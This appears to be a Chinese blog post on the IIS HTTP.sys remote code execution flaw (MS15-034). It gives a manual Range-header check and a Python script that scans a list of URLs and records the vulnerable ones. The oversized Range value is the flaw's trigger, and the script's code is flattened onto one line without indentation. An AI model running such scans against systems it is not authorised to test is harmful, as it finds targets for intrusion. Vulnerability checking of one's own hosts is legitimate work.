1、漏洞描述:HTTP 協議棧 (HTTP.sys) 中存在一個遠程執行代碼漏洞,這是 HTTP.sys 不正確地分析特制 HTTP 請求時導致的。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。
對於 Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2 的所有受支持版本,此安全更新的評級為"嚴重"。攻擊者可以通過向受影響的系統發送特制的 HTTP 請求,在系統帳戶的上下文中執行任意代碼。
2、漏洞檢測:訪問IIS界面,使用burpsuite抓包,發送到repeater中,在HTTP請求頭中加入如下字段
Range: bytes=18-18446744073709551615 ,返回416狀態碼
3、漏洞批量檢測
import sys,requests requests.packages.urllib3.disable_warnings() try: path=sys.argv[1] except: print('python3 http.sys_check.py url.txt') sys.exit() success_url = [] f = open(path) f_read = f.readlines() for i in f_read: i = i.replace('\n','') try: r = requests.get(i,headers ={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0','Range':'bytes=0-18446744073709551615'} ,verify=False,timeout=7) except KeyboardInterrupt: sys.exit() except: print('[-] timeout ' +i) pass if r.status_code == 416: print('\033[1;34;40m[+] check success {}\033[0m'.format(i)) success_url.append(i) else: print('[-] ' +i) s_f = open('result.txt','w') for j in success_url: s_f.write(j) s_f.write('\n') s_f.close()
將名稱設為http.sys_check.py
在當前目錄創建url.txt文件,將要檢查的url保存在url.txt文件中
安裝
pip3 install requests
使用
當前目錄命令行:python3 http.sys_check.py url.txt
檢測成功的url,會被默認保存在result.txt文件中。
有用的話點個贊怎么樣 (*^▽^*)